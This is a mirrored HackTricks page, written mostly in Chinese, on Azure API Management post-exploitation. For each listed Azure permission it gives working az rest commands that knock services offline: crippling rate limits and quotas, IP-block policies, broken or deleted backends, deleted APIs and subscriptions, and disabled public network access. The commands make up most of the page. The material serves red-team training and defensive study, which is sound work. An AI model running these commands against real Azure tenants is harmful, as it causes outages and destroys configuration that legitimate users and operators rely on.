mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-01-01 23:39:52 -08:00
3.9 KiB
3.9 KiB
Azure - API Management Post-Exploitation
{{#include ../../../banners/hacktricks-training.md}}
Microsoft.ApiManagement/service/apis/policies/write 或 Microsoft.ApiManagement/service/policies/write
攻击者可以使用多种向量造成拒绝服务。为了阻止合法流量,攻击者会添加限速和配额策略,将值设置得极低,从而有效地阻止正常访问:
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><rate-limit calls=\"1\" renewal-period=\"3600\" /><quota calls=\"10\" renewal-period=\"86400\" /><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
}
}'
为了阻止特定的合法客户端 IP,attacker 可以添加 IP 过滤策略,拒绝来自选定地址的请求:
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><ip-filter action=\"forbid\"><address>1.2.3.4</address><address>1.2.3.5</address></ip-filter><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
}
}'
Microsoft.ApiManagement/service/backends/write or Microsoft.ApiManagement/service/backends/delete
要使请求失败,攻击者可以修改 backend 配置并将其 URL 更改为无效或无法访问的地址:
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
"properties": {
"url": "https://invalid-backend-that-does-not-exist.com",
"protocol": "http"
}
}'
或者删除 backends:
az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "If-Match=*"
Microsoft.ApiManagement/service/apis/delete
为了使关键 API 无法使用,攻击者可以直接从 API Management service 删除它们:
az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>?api-version=2024-05-01" \
--headers "If-Match=*"
Microsoft.ApiManagement/service/write or Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action
为了阻止来自 Internet 的访问,攻击者可以在 API Management 服务上禁用公共网络访问:
az rest --method PATCH \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"publicNetworkAccess": "Disabled"
}
}'
Microsoft.ApiManagement/service/subscriptions/delete
要阻止合法用户的访问,攻击者可以删除 API Management 订阅:
az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<apim-subscription-id>?api-version=2024-05-01" \
--headers "If-Match=*"
{{#include ../../../banners/hacktricks-training.md}}